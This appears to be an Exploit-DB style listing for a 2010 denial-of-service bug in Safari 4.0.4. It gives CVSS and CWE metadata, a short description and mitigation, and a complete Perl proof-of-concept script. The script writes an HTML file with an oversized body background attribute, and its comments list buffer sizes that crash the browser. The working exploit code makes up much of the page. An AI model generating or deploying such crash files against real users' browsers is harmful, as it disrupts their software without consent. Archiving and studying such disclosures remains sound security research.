Safari 4.0.4 (531.21.10) - Stack Overflow/run

vendor:

Safari

by:

John Cobb

7,5

CVSS

HIGH

Stack Overflow

119

CWE

Product Name: Safari

Affected Version From: 4.0.4 (531.21.10)

Affected Version To: 4.0.4 (531.21.10)

Patch Exists: YES

Related CWE: N/A

CPE: apple:safari

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP (32-bit)

2010

Safari 4.0.4 (531.21.10) – Stack Overflow/run

This exploit is a proof-of-concept (POC) for a denial-of-service (DoS) vulnerability in Safari 4.0.4 (531.21.10). It was discovered by John Cobb in January 2010 and tested on Windows XP (32-bit) SP3. The exploit involves creating an HTML file with a background attribute containing a large number of 'A' characters. When the file is opened in Safari, the browser will crash due to a stack overflow.

Mitigation:

Users should update to the latest version of Safari to ensure that they are not vulnerable to this exploit.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
# Safari 4.0.4 (531.21.10) - Stack Overflow/run
# 0Day DoS POC by John Cobb - www.NoBytes.com - 20/01/2010 - [v1.0]
# Tested on WinXP (32bit) SP3
#
# Magic Numbers:
# 114516 -> 114718 : Safari quits without error
# 114719 : Safari quits with illegal operation:
# AppName: safari.exe
# AppVer: 5.31.21.10
# ModName: cfnetwork.dll
# ModVer: 1.450.5.0
# Offset: 000567a7

$filename = $ARGV[0];
$buffer = $ARGV[1];
if(!defined($filename))
{
print "Usage: $0 <filename.html> <buffer>\n\n";
}

$header = "<html>
<head>" . "\n";
$crash = "<body background = \"" . "A" x $buffer . "\">" . "\n";
$footer = "</html>" . "\n";

$data = $header . $crash . $footer;

open(FILE, '>' . $filename);
print FILE $data;
close(FILE);

exit;